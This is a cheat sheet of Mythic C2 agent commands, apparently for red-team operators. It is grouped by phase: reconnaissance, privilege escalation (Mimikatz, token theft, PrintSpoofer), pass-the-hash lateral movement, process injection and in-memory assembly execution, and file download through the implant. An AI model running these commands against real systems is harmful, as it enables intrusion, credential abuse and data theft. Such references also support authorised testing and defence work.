Mythic
Beacon Management (Real-Time C2 Control)
# Set sleep interval and jitter to 0 so the agent checks in continuously (interactive; produces constant callback traffic)
Mythic > sleep 0 0
# Instruct agent to exit
Mythic > exit
# List all running jobs
Mythic > jobs
# Kill a specific job
Mythic > jobkill [jid]
# Load additional commands into agent
Mythic > load command1 command2 ...
# Link to a peer-to-peer (SMB/TCP) agent
Mythic > link
# Unlink a linked agent
Mythic > unlink
Information Gathering / Recon
# List network interfaces and IP addresses
Mythic > ifconfig
# List running processes
Mythic > ps
# List directory contents
Mythic > ls -Path [path]
# Print current working directory
Mythic > pwd
# Display domain controllers
Mythic > net_dclist [domain.local]
# List shares on a remote machine
Mythic > net_shares -Computer [hostname]
# Show local groups on a machine
Mythic > net_localgroup [hostname]
# Show members of a local group
Mythic > net_localgroup_member -Group [groupname] -Computer [hostname]
# View network connections
Mythic > netstat -Tcp -Udp
# Take a screenshot
Mythic > screenshot
Privilege Escalation
# Attempt to enable every privilege present on the current access token
Mythic > getprivs
# Run a Mimikatz command through the agent (this example requests SeDebugPrivilege)
Mythic > mimikatz -Command "privilege::debug"
# Steal token from a PID
Mythic > steal_token [pid]
# Create a token from a user's plaintext credentials and impersonate it
Mythic > make_token -username [user] -password [pass]
# PrintSpoofer to escalate to SYSTEM
Mythic > printspoofer -Command "cmd.exe"
# Revert to original token
Mythic > rev2self
Lateral Movement
# Use Pass-the-Hash to run commands
Mythic > pth -Domain [domain] -User [user] -NTLM [hash] -Run [cmd.exe]
# Copy file to remote system
Mythic > cp -Path [source] -Destination [dest]
# Query services on a remote host (the sc command can also manipulate them)
Mythic > sc -Query -Computer [host]
# Use PowerShell remoting (if applicable)
Mythic > powershell -Command "Invoke-Command ..."
Post-Exploitation / Execution
# Run shell command
Mythic > shell whoami
# Run PowerShell in current process
Mythic > powershell -Command "Get-Process"
# Import a PowerShell script so that later PowerShell commands can use it
Mythic > powershell_import
# Inject PowerShell into a specific process
Mythic > psinject -PID [pid] -Command "..."
# Execute a .NET assembly (example: SharpHound with all collection methods, zip output named "mythical")
Mythic > execute_assembly -Assembly SharpHound.exe -Arguments "-c all --zipfilename mythical"
# Register a .NET assembly with the agent so later assembly-execution commands can reference it
Mythic > register_assembly
# Execute inline .NET assembly
Mythic > inline_assembly -Assembly [Assembly.exe] -Arguments "..."
# Execute unmanaged PE
Mythic > execute_pe -PE [binary.exe] -Arguments "..."
# Execute Beacon Object File (BOF)
Mythic > execute_coff -Coff [file.o] -Function [go]
File Transfer
# Upload a file
Mythic > upload
# Download a file
Mythic > download -Path [path]
# Remove a file
Mythic > rm -Path [path]